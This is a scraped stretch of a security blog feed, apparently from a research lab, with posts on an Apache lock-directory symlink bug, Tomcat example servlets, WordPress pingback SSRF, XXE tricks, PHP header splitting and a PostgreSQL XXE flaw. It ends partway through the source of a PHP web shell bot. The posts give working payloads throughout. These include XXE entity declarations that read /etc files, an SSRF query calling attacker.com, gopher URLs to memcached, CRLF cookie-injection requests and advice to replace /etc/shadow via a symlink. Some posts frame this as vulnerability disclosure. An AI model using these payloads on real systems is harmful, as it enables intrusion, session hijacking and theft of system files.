Lets try to analyse <a href="http://anonscm.debian.org/gitweb/?p=pkg-apache/apache2.git;a=commitdiff;h=e8559f83064458ce36b421e197df864da03b5754">patch for this bug</a>:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi41Dx75DmkpntLiFD8WYZA9dg5XlDOfEubIN2ssjMPh26P-i72JMieVMiBcoUt5A4umj7FB0BNIDCHFXws5TTk154yFxQRXVBEB8dAMQDFHU48LLxwQ4AhZdm38xZ0XhsR4TSQRlGMqF0/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2013-03-06+%D0%B2+2.27.41.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi41Dx75DmkpntLiFD8WYZA9dg5XlDOfEubIN2ssjMPh26P-i72JMieVMiBcoUt5A4umj7FB0BNIDCHFXws5TTk154yFxQRXVBEB8dAMQDFHU48LLxwQ4AhZdm38xZ0XhsR4TSQRlGMqF0/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2013-03-06+%D0%B2+2.27.41.png" /></a></div>
<br />
<br />
As you can see, <b>install</b> command was replaced to <b>mkdir_chown</b> function which contains many security checks.<br />
<br />
Lets try to understand what happens where "install -d -o www-data /var/lock/apache" called.<br />
<br />
This command creates directory /var/lock/apache and that set chown www-data to this directory.<br />
<br />
But if this directory was already created as a symlink to another directory (/var/lock have <b>a+w</b> privileges), <b>install</b> command change privileges to this directory. Simplest exploitation way is create directory /var/lock/apache as a symlink to /etc/ directory and than delete /etc/shadow file and recreate it with yourself content under <b>www-data</b> user privileges.</div>
Vladimirhttp://www.blogger.com/profile/15214373847405926820noreply@blogger.com11tag:blogger.com,1999:blog-7173843122198586393.post-49773634988233076692013-03-02T22:29:00.003-08:002013-03-02T22:29:39.480-08:00Tomcat Servlet Examples threats<div dir="ltr" style="text-align: left;" trbidi="on">
Tomcat application server by default contains "/examples" directory which has many example servlets and JSPs.<br />
We strongly recommend to disable public access to this directory by following security reasons:<br />
<br />
<ul style="text-align: left;">
<li>Bypassing HttpOnly Cookies protection</li>
<li>CSRF cookies manipulation</li>
<li>Session manipulation</li>
</ul>
<div>
HttpOnly flag must protect user's cookies from client-side attacks such as XSS. There are two example servlets in Tomcat which shows all cookies in plain/text HTTP response:</div>
<div>
<ul style="text-align: left;">
<li><b>/examples/servlets/servlet/RequestHeaderExample</b></li>
<li><b>/examples/servlets/servlet/CookieExample</b></li>
</ul>
<div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmBnbqcRM4Zg27sNshfzzH3HyupCLqrcs-XXZ95yvFxastq0FSGgn2v5C6OxrQYocXaqDAQjOC5_0KCdxOTLaMKabjyhCepuzAdwzQutTyfn9ugAoqvFZeWzG50WdtIdz6__Jq0gV-34M/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2013-03-03+%D0%B2+10.21.01.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmBnbqcRM4Zg27sNshfzzH3HyupCLqrcs-XXZ95yvFxastq0FSGgn2v5C6OxrQYocXaqDAQjOC5_0KCdxOTLaMKabjyhCepuzAdwzQutTyfn9ugAoqvFZeWzG50WdtIdz6__Jq0gV-34M/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2013-03-03+%D0%B2+10.21.01.png" /></a>Second servlet also provides CSRF-based cookie manipulations: set/redefine by GET and POST requests both.</div>
</div>
<div>
<br />
Session manipulation is more interesting. Looks at <b>/examples/servlets/servlet/SessionExample</b> servlet. It is simplest way to gain admin privileges in target webapps which hosted on same Tomcat with SessionExample servlet.<br />
<br />
Session is global and this servlet provides you any manipulations with your session!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFPbBRwP1A4pHUlJ5Ic5Vt-eQUE7R-TVEQ3jqF4l0DCKwMBUzuhBbAUjFcxToY3-P2wrq2GeKA3g5UTcb3r9yf5Du21AMtQmSzaeKSQmLHY0NekV9HrvCrHFntK6_tn7W58YcF4Ao7TVs/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2013-03-03+%D0%B2+10.26.37.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="214" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFPbBRwP1A4pHUlJ5Ic5Vt-eQUE7R-TVEQ3jqF4l0DCKwMBUzuhBbAUjFcxToY3-P2wrq2GeKA3g5UTcb3r9yf5Du21AMtQmSzaeKSQmLHY0NekV9HrvCrHFntK6_tn7W58YcF4Ao7TVs/s320/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2013-03-03+%D0%B2+10.26.37.png" width="320" /></a><span style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;"><b>We strongly recommend to disable public access to /examples directory again.</b></span></div>
</div>
</div>
Vladimirhttp://www.blogger.com/profile/15214373847405926820noreply@blogger.com19tag:blogger.com,1999:blog-7173843122198586393.post-1930695486562237632013-01-04T17:42:00.002-08:002013-01-08T08:30:52.745-08:00WordPress XMLRPC pingback additional issues<div dir="ltr" style="text-align: left;" trbidi="on">
Vulnerability in WordPress XMLRPC pingback function was recently published:<br />
<a href="http://www.ethicalhack3r.co.uk/introduction-to-the-wordpress-xml-rpc-api/">http://www.ethicalhack3r.co.uk/introduction-to-the-wordpress-xml-rpc-api/</a><br />
<br />
Basically this vuln can be used to scan opened ports on localhost and intranet:<br />
<a href="https://github.com/FireFart/WordpressPingbackPortScanner">https://github.com/FireFart/WordpressPingbackPortScanner</a><br />
<br />
<b>But in fact, this vulnerability is much wider!</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRrjzkK8gH-5KLgVabSVyUZVhqKuLtfeF6-LDZ2XbA1f3CzCxhqwSUAcw4EPaONEHC-hYrjWCWl6wUISHMxDZKx1jOIMhgA4PfO2G0XaKU5_4vsR56ObhoaATNVyJdLGpebjeiQtVdtOA/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2013-01-05+%D0%B2+5.37.32.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="304" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRrjzkK8gH-5KLgVabSVyUZVhqKuLtfeF6-LDZ2XbA1f3CzCxhqwSUAcw4EPaONEHC-hYrjWCWl6wUISHMxDZKx1jOIMhgA4PfO2G0XaKU5_4vsR56ObhoaATNVyJdLGpebjeiQtVdtOA/s640/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2013-01-05+%D0%B2+5.37.32.png" width="640" /></a></div>
<b><br /></b>
First, look at "SSRF bible. Cheatsheet":<br />
<a href="https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit">https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit</a><br />
and our ZeroNights 0x02 presentation:<br />
<span style="color: #1155cc; font-family: Arial;"><span style="font-size: 15px; white-space: pre-wrap;"><a href="http://www.slideshare.net/d0znpp/ssrf-attacks-and-sockets-smorgasbord-of-vulnerabilities">http://www.slideshare.net/d0znpp/ssrf-attacks-and-sockets-smorgasbord-of-vulnerabilities</a></span></span><br />
<br />
Lets try to exploit this bug as a <b>SSRF</b>!<br />
By default WP try to use cURL (libcurl) to make a requests:<br />
<br />
<code>
./wp-includes/class-wp-xmlrpc-server.php:<br />
4988 $linea = wp_remote_fopen( $pagelinkedfrom );
</code>
<br />
<code><br /></code>
<code>
./wp-includes/functions.php:<br />
749 function wp_remote_fopen( $uri ) {<br />
...<br />
758 $response = wp_remote_get( $uri, $options );
</code>
<br />
<code><br /></code>
<code>
./wp-includes/http.php:<br />
74 function wp_remote_get($url, $args = array()) {<br />
75 $objFetchSite = _wp_http_get_object();<br />
76 return $objFetchSite->get($url, $args);
...<br />
22 function &_wp_http_get_object() {<br />
23 static $http;<br />
24<br />
25 if ( is_null($http) )<br />
26 $http = new WP_Http();<br />
</code>
<br />
<code><br /></code>
<code>
./wp-includes/class-http.php:<br />
294 function get($url, $args = array()) {<br />
295 $defaults = array('method' => 'GET');<br />
296 $r = wp_parse_args( $args, $defaults );<br />
297 return $this->request($url, $r);<br />
298 }<br />
...
</code><br />
<code> 81 function request( $url, $args = array() ) {<br />
...<br />
191 return $this->_dispatch_request($url, $r);<br />
...<br />
243 private function _dispatch_request( $url, $args ) {<br />
244 static $transports = array();<br />
245<br />
246 $class = $this->_get_first_available_transport( $args, $url<br />
...<br />
205 public function _get_first_available_transport( $args, $url = null )<br />
206 $request_order = array( 'curl', 'streams', 'fsockopen' );</code><br />
Now you know that using file:// gopher:// dict:// ldap:// and other schemas do this bug really dangerous.<br />
It is easy to exploit local services and host-based auth by dict/gopher.<br />
<br />
Try to read data from response. It is may be response with local file content (file://) or data from intranet/services (http://wiki.internal.local, gopher://localhost:11211/1get%20secretkey%0aquit).<br />
<br />
Look at WP code again:<br />
<br />
<code>
./wp-includes/class-wp-xmlrpc-server.php:<br /> 4988 $linea = wp_remote_fopen( $pagelinkedfrom );<br /> 4989 if ( !$linea )<br /> ...<br /> 4999 preg_match('|<title>([^<]*?)</title>|is', $linea, $matchtitle);<br /> 5000 $title = $matchtitle[1];
<br /> 5001 if ( empty( $title ) )<br /> 5002 return new IXR_Error(32, __('We cannot find a title on that page.'));<br /> 5003<br /> 5004 $linea = strip_tags( $linea, '<a>' ); // just keep the tag we need<br /> 5005<br /> 5006 $p = explode( "\n\n", $linea );<br /> 5007<br /> 5008 $preg_target = preg_quote($pagelinkedto, '|');<br /> 5009 foreach ( $p as $para ) {<br /> 5010 if ( strpos($para, $pagelinkedto) !== false ) { // it exists, but is it a link?<br /> 5011 preg_match("|<a[^>]+?".$preg_target."[^>]*>([^>]+?)</a>|", $para, $context);<br /> 5012<br /> 5013 // If the URL isn't in a link context, keep looking<br /> 5014 if ( empty($context) )<br /> 5015 continue;</code><br />
<code> ...</code><br />
<code></code><br />
<code> 5019 $excerpt = preg_replace('|\</?wpcontext\>|', '', $para);</code><br />
<code> 5020 </code><br />
<code> 5021 // prevent really long link text</code><br />
<code> 5022 if ( strlen($context[1]) > 100 )</code><br />
<code> 5023 $context[1] = substr($context[1], 0, 100) . '...';</code><br />
<code>
</code>
<br />
Data between "<titile>" and "</title>" strings will be put in author field of comment (255 bytes limited by DB field).<br />
Data between "<a >" and "</a>" strings will be put in content field of comment (100 bytes limited by line 5022).<br />
<br />
Now it is clear that you can read 355 bytes of arbitrary data.<br />
<br />
Let's try to read data from <b>access.log</b>. <br />
First inject markers into access.log by following requests:<br />
http://localhost/tests/wordpress/#<title><br />
http://localhost/tests/wordpress/#</title><br />
http://localhost/tests/wordpress/#<a http://localhost/tests/wordpress/?p=1><br />
http://localhost/tests/wordpress/#</a><br />
<br />
Send requests with markers by manually crafted HTTP packets like this (browsers create HTTP requests w/o anchors):<br />
<code>
GET /tests/wordpress/#<a>marker1 HTTP/1.1<br />
Host: localhost<br />
</code>
<br />
<div>
Now you can add comment with arbitrary data between your markers using simple XMLRPC request (see slides 20-23 from our presentation about ProcFS way to read access.log):</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Ga3IJpGOW6aYeZ_p8D2qEVnFgJSaHvLr5ySRKwt7JYG4yYe3h9GTFf66nHZoHc_bq9U1e5h7yA66ANuvyZpGRCr8d-6N_NxUmD_nScxUTYgy9HuzLRHcb35NsDCR6b2fZVzEuJVRiSk/s1600/wp-1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="163" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Ga3IJpGOW6aYeZ_p8D2qEVnFgJSaHvLr5ySRKwt7JYG4yYe3h9GTFf66nHZoHc_bq9U1e5h7yA66ANuvyZpGRCr8d-6N_NxUmD_nScxUTYgy9HuzLRHcb35NsDCR6b2fZVzEuJVRiSk/s640/wp-1.png" width="640" /></a></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh13LrfldXtg1pUzkc5P3nUyi8eFS04NTGYWJTeOVVZEjluDbV4qm1_nmtPW-lUmKd5g96V7MrQ8MBw-YtvKRBX4S2RRlLzOq4Vlv4rU2N-2Q-vGidzM54-Ttu5O1omSngYVGstZlgs3C8/s1600/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA+%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0+2013-01-05+%25D0%25B2+5.43.38.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="535" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh13LrfldXtg1pUzkc5P3nUyi8eFS04NTGYWJTeOVVZEjluDbV4qm1_nmtPW-lUmKd5g96V7MrQ8MBw-YtvKRBX4S2RRlLzOq4Vlv4rU2N-2Q-vGidzM54-Ttu5O1omSngYVGstZlgs3C8/s640/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA+%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0+2013-01-05+%25D0%25B2+5.43.38.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
For fun - reading output of <b>stats</b> memcached command:
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXRw8Bnl-gm6kddF0y7EuaaT5idKhmPpcC7L8wyTlP0mQkMNyyURKjpa0eFrbb1t54mRlyneuRg9wVafPzNk4YvumwkNcVqgA2WVyTcU4i91Zw4mXuBmKXFPDO_Udy9GyrgGUBT7ubfDM/s1600/ssrf-5.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXRw8Bnl-gm6kddF0y7EuaaT5idKhmPpcC7L8wyTlP0mQkMNyyURKjpa0eFrbb1t54mRlyneuRg9wVafPzNk4YvumwkNcVqgA2WVyTcU4i91Zw4mXuBmKXFPDO_Udy9GyrgGUBT7ubfDM/s640/ssrf-5.png" width="640" /></a></div>
<br /></div>
</div>
Vladimirhttp://www.blogger.com/profile/15214373847405926820noreply@blogger.com139tag:blogger.com,1999:blog-7173843122198586393.post-65462234612392142192012-12-20T10:26:00.004-08:002012-12-20T10:28:36.837-08:00Advanced mobile UI redressing attacks using gyroscope/accelerometer<div dir="ltr" style="text-align: left;" trbidi="on">
When you hold a mobile phone in hand and put your finger on the screen area where you want to tap, you move phone a little.<br />
<div>
<br /></div>
<div>
These deviations can be measured with a built-in gyroscope and accelerometer and use for UI-redressing attack.</div>
<div>
<br /></div>
<div>
You probably won't react timely to take off your finger while pressing the screen even if you see some other graphic object (such as window or button) on the area where you are going to press.<br />
<br />
Funny video:</div>
<div>
<a href="http://goanimate.com/videos/0qD3CQgMX-qY?utm_source=embed&uid=0dfqhWC0Xpmc" target="_blank">Advanced mobile UI redressing attack</a> by <a href="http://goanimate.com/user/0dfqhWC0Xpmc" target="_blank">d0znpp</a> on <a href='http://goanimate.com?utm_source=embed' target="_blank">GoAnimate</a><br/><iframe scrolling="no" allowTransparency="true" frameborder="0" width="400" height="258" src="http://goanimate.com/player/embed/0qD3CQgMX-qY"></iframe><br/><a href="http://goanimate.com?utm_source=embed&utm_medium=link&utm_term=Animated+Presentations&utm_campaign=embedse" target="_blank">Animated Presentations</a> - Powered by GoAnimate.
</div>
</div>Vladimirhttp://www.blogger.com/profile/15214373847405926820noreply@blogger.com456tag:blogger.com,1999:blog-7173843122198586393.post-112848865425183222012-10-04T00:14:00.001-07:002012-10-04T01:27:48.860-07:00Error-based XXE exploitation trick<div dir="ltr" style="text-align: left;" trbidi="on">
Exploiting of XXE vulnerabilities are difficult when you cannot view results XML document.<br />
<br />
Recent vulnerability in <a href="http://lab.onsec.ru/2012/06/postgresql-all-error-based-xxe-0day.html">Postgres XXE</a> are good example of this: entities resolved but not added to XML output. This is common case in the wild.<br />
<br />
Bring to your attention easy trick which provide reading first and last lines of ASCII files (which cannot be read by classic XXE attack vector, such as error-based case):<br />
<br />
<blockquote class="tr_bq">
<!DOCTYPE [<br />
<!ENTITY malformed SYSTEM "/dev/urandom" ><!-- sometimes also /dev/null --><br />
<!ENTITY wanttoread SYSTEM "/etc/hostname" ><br />
]><br />
<!-- read first line of file using error-based XXE --><br />
<root><br />
&malformed; &wanttoread;<br />
</root></blockquote>
<br />
<blockquote class="tr_bq">
<!DOCTYPE [<br />
<!ENTITY malformed SYSTEM "/dev/urandom" ><!-- sometimes /dev/null --><br />
<!ENTITY wanttoread SYSTEM "/etc/hostname" ><br />
]><br />
<!-- read last line of file using error-based XXE --><br />
<root><br />
&wanttoread; &malformed;<br />
</root></blockquote>
<br />
In error message you will look at smth like this:<br />
<blockquote class="tr_bq">
ERROR: hostnamestr<br />
^<br />
didn't parse (line: 1 pos: 13)</blockquote>
</div>
Vladimirhttp://www.blogger.com/profile/15214373847405926820noreply@blogger.com36tag:blogger.com,1999:blog-7173843122198586393.post-70616623725639101202012-08-23T16:20:00.000-07:002012-08-23T16:35:20.286-07:00PHP multiple headers bypass available again<div dir="ltr" style="text-align: left;" trbidi="on">
Recenlty we <a href="http://www.slideshare.net/d0znpp/smuggling-splitting-poisoning-zeronights-onsec">wrote about universal PHP bypass for header() function</a>.<br />
That trick is based on %0d byte instead of %0d%0a to split HTTP response.<br />
Bug was fixed as you can see at changelog:<br />
<a href="http://php.net/ChangeLog-5.php">http://php.net/ChangeLog-5.php</a><br />
<blockquote class="tr_bq">
<blockquote>
<b>Version 5.3.11</b> </blockquote>
</blockquote>
<blockquote class="tr_bq">
<blockquote>
<span style="background-color: white; font-family: verdana, arial, helvetica, sans-serif; font-size: 14px;">Fixed bug </span><span style="color: #000099; font-family: verdana, arial, helvetica, sans-serif;"><span style="background-color: white; font-size: 14px;"><a href="http://www.blogger.com/goog_1854555071">#60227</a></span></span><span style="background-color: white; font-family: verdana, arial, helvetica, sans-serif; font-size: 14px;"><a href="https://bugs.php.net/bug.php?id=60227"> </a>(header() cannot detect the multi-line header with CR).</span> </blockquote>
</blockquote>
<a href="https://bugs.php.net/bug.php?id=60227"> https://bugs.php.net/bug.php?id=60227</a> is original bug<br />
And what about fix?<br />
<br />
<blockquote class="tr_bq">
for (i = 0; i < header_line_len; i++) {<br />
/* RFC 2616 allows new lines if followed by SP or HT */<br />
int illegal_break =<br />
<span style="color: red;"> (header_line[i+1] != ' ' && header_line[i+1] != '\t')</span> && (<br />
header_line[i] == '\n'<br />
|| (header_line[i] == '\r' && header_line[i+1] != '\n'));</blockquote>
<div>
Pay your attention to red line.</div>
<br />
And as we wrote before, bug still available for Internet Explorer.<br />
<br />
Source code:<br />
<blockquote class="tr_bq">
<?php<br />
header("Location: /?asd".$_GET['r']);<br />
?></blockquote>
Attack vectors:<br />
GET /?r=split<span style="color: red;">%0d+</span>Set-cookie:PHPSESSID=predicated HTTP/1.1<br />
<br />
GET /?r=split<span style="color: red;">%0d%20</span>Set-cookie:PHPSESSID=predicated HTTP/1.1<br />
<br />
GET /?r=split<span style="color: red;">%0d%09</span>Set-cookie:PHPSESSID=predicated HTTP/1.1<br />
<br />
GET /?r=split<span style="color: red;">%0d%0a+</span>Set-cookie:PHPSESSID=predicated HTTP/1.1<br />
<br />
GET /?r=split<span style="color: red;">%0d%0a%20</span>Set-cookie:PHPSESSID=predicated HTTP/1.1<br />
<br />
GET /?r=split<span style="color: red;">%0d%0a%09</span>Set-cookie:PHPSESSID=predicated HTTP/1.1</div>
Vladimirhttp://www.blogger.com/profile/15214373847405926820noreply@blogger.com14tag:blogger.com,1999:blog-7173843122198586393.post-80403203200180660212012-06-01T04:12:00.002-07:002012-06-02T01:41:58.638-07:00PostgreSQL (all) error-based XXE 0day<div dir="ltr" style="text-align: left;" trbidi="on">
Recently we found and published at <a href="http://phdays.com/">PHDays</a> PostgreSQL 0day error-based XXE vulnerability.<br />
Currently it may be used by attacker to read parts of local files and make requests from DB server to intranet (SSRF - Server Side Request Forgery).<br />
<br />
Example:<br />
DoS:<br />
select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/dev/random">]><content>&abc;</content>')<br />
<br />
SSRF:<br />
select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "http://attacker.com/?xxe=OK">]><content>&abc;</content>')<br />
<br />
Error-based XXE:<br />
<br />
select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;</content>');<br />
<br />
<blockquote class="tr_bq">
ERROR: invalid XML document<br />
DETAILS: /etc/network/if-up.d/mountnfs:28: parser error : StartTag: invalid element name<br />
<span style="color: red;"><span class="Apple-tab-span" style="white-space: pre;"> </span>exec 9<&0 </etc/fstab</span><span class="Apple-tab-span" style="white-space: pre;"> </span> ^<br />
/etc/network/if-up.d/mountnfs:28: parser error : xmlParseEntityRef: no name<br />
<span style="color: red;"><span class="Apple-tab-span" style="white-space: pre;"> </span>exec 9<&0 </etc/fstab</span><span class="Apple-tab-span" style="white-space: pre;"> </span> ^<br />
/etc/network/if-up.d/mountnfs:28: parser error : chunk is not well balanced<br />
<span style="color: red;"><span class="Apple-tab-span" style="white-space: pre;"> </span>exec 9<&0 </etc/fstab</span><span class="Apple-tab-span" style="white-space: pre;"> </span> ^<br />
Entity: line 1: parser error : Failure to process entity abc<br />
E content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;<br />
^<br />
Entity: line 1: parser error : Entity 'abc' not defined<br />
E content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc; ^</blockquote>
<b><span style="color: red;">UPDATE!</span></b><br />
Classical XXE from XSLT transformation found.<br />
Reading any data are possible also:<br />
<br />
<br />
SELECT xslt_process('<!DOCTYPE employee [<!ENTITY asd SYSTEM "/etc/passwd">] ><employee><name>&asd;</name><age>30</age><pay>400</pay></employee>'::text, $$<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0"><xsl:template match="*"> <xsl:element name="samples"> <xsl:element name="sample"><xsl:value-of select="//employee/name/text()"/> </xsl:element> </xsl:element></xsl:template></xsl:stylesheet>$$::text, 'n1=v1,n2=v2,n3=v3,n4=v4,n5=v5'::text);<br />
<blockquote class="tr_bq">
xslt_process <br />
-----------------------------------------------------------------------------------------<br />
<?xml version="1.0"?><br />
<samples><sample>root:x:0:0:root:/root:/bin/bash<br />
daemon:x:1:1:daemon:/usr/sbin:/bin/sh<br />
bin:x:2:2:bin:/bin:/bin/sh<br />
sys:x:3:3:sys:/dev:/bin/sh<br />
sync:x:4:65534:sync:/bin:/bin/sync<br />
games:x:5:60:games:/usr/games:/bin/sh<br />
man:x:6:12:man:/var/cache/man:/bin/sh<br />
lp:x:7:7:lp:/var/spool/lpd:/bin/sh<br />
mail:x:8:8:mail:/var/mail:/bin/sh<br />
news:x:9:9:news:/var/spool/news:/bin/sh<br />
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh<br />
proxy:x:13:13:proxy:/bin:/bin/sh<br />
www-data:x:33:33:www-data:/var/www:/bin/sh<br />
backup:x:34:34:backup:/var/backups:/bin/sh<br />
list:x:38:38:Mailing List Manager:/var/list:/bin/sh<br />
irc:x:39:39:ircd:/var/run/ircd:/bin/sh<br />
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh<br />
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh<br />
libuuid:x:100:101::/var/lib/libuuid:/bin/sh<br />
nslcd:x:101:103:nslcd name service LDAP connection daemon,,,:/var/run/nslcd/:/bin/false<br />
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin<br />
puppet:x:109:111:Puppet configuration management daemon,,,:/var/lib/puppet:/bin/false<br />
Debian-exim:x:111:115::/var/spool/exim4:/bin/false<br />
alexandro:x:1000:1000:Alexander Golovko,,,:/home/alexandro:/bin/bash<br />
oxod:x:1001:1001:,,,:/home/oxod:/bin/bash<br />
mysql:x:103:105:MySQL Server,,,:/var/lib/mysql:/bin/false<br />
postgres:x:104:107:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash<br />
oracle:x:1002:1002::/u01/app/oracle:/bin/bash<br />
</sample></samples><br />
<br />
(1 row)</blockquote>
<div>
<br /></div>
</div>Vladimirhttp://www.blogger.com/profile/15214373847405926820noreply@blogger.com20tag:blogger.com,1999:blog-7173843122198586393.post-63172358516424082532012-05-26T10:14:00.002-07:002012-05-27T02:50:14.547-07:00PHP all getimage() bypass<div dir="ltr" style="text-align: left;" trbidi="on">
Many PHP projects have image validation, based on getimagesize() function:<br />
<a href="http://php.net/manual/ru/function.getimagesize.php">http://php.net/manual/ru/function.getimagesize.php</a><br />
<br />
That function has an error, provides attacker to read <a href="http://en.wikipedia.org/wiki/Berkeley_DB">Berkley DB</a> format and another files, started at 0x00 (null-byte).<br />
<br />
<?php<br />
if(<b>getimagesize</b>("/etc/aliases.db")){<br />
echo "OK";<br />
}<br />
?><br />
#php -f gis-test.php<br />
OK<br />
<br />
In *BSD systems and MacOS Berkley DB files used as configs.<br />
It may be used by attacker to bypass image reading functions based on getimagesize().<br />
<br />
We used that trick on <a href="http://phdays.com/program/contests/#6317">PHD pre-hackquest's (Blow Up the Town) </a>task called Tretyakovskaya.<br />
It was sucessfull find by participants listed below:<br />
<span style="background-color: black; color: white; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 12px;">rdot.org</span><br />
<span style="background-color: #333333; color: white; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 12px;">shr</span><br />
<span style="background-color: black; color: white; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 12px;">AVictor</span><br />
<span style="background-color: #333333; color: white; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 12px;">Antichat</span><br />
<span style="background-color: black; color: white; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 12px;">MERRON</span><br />
<span style="background-color: #333333; color: white; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 12px;">letm</span><br />
<span style="background-color: black; color: white; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 12px;">sc2tv</span><br />
<span style="background-color: #333333; color: white; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 12px;">DarkByte</span><br />
<span style="background-color: black; color: white; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 12px;">ei-grad</span><br />
<span style="background-color: #333333; color: white; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 12px;">vos</span><br />
<span style="background-color: black; color: white; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 12px;">korvin</span><br />
<span style="background-color: #333333; color: white; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 12px;">grixa</span><br />
<span style="background-color: black; color: white; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 12px;">n0ne</span><br />
<span style="background-color: #333333; color: white; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 12px;">Endragor</span><br />
<span style="background-color: black; color: white; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 12px;">tiger</span><br />
Greetz, guys!</div>Vladimirhttp://www.blogger.com/profile/15214373847405926820noreply@blogger.com12tag:blogger.com,1999:blog-7173843122198586393.post-42415719079077881392012-04-17T01:36:00.000-07:002012-04-17T01:36:12.068-07:00Find new web bot [Jembot]<div dir="ltr" style="text-align: left;" trbidi="on">We have discovered a new kind of bot that spreads in the form of web shells, called <b>Jembot</b>.<br />
Source code:<br />
<br />
<blockquote class="tr_bq"><?php<br />
if(isset($_GET['jembot']))<br />
{<br />
echo "<body bgcolor=black><br />
<font color=cyan size=3>";<br />
echo "<h2>empixcrew technology</h2><hr>";<br />
echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\"><br />
<label for=\"file\">empix:</label><br />
<input type=\"file\" name=\"file\" id=\"file\" /><br />
<br /><br />
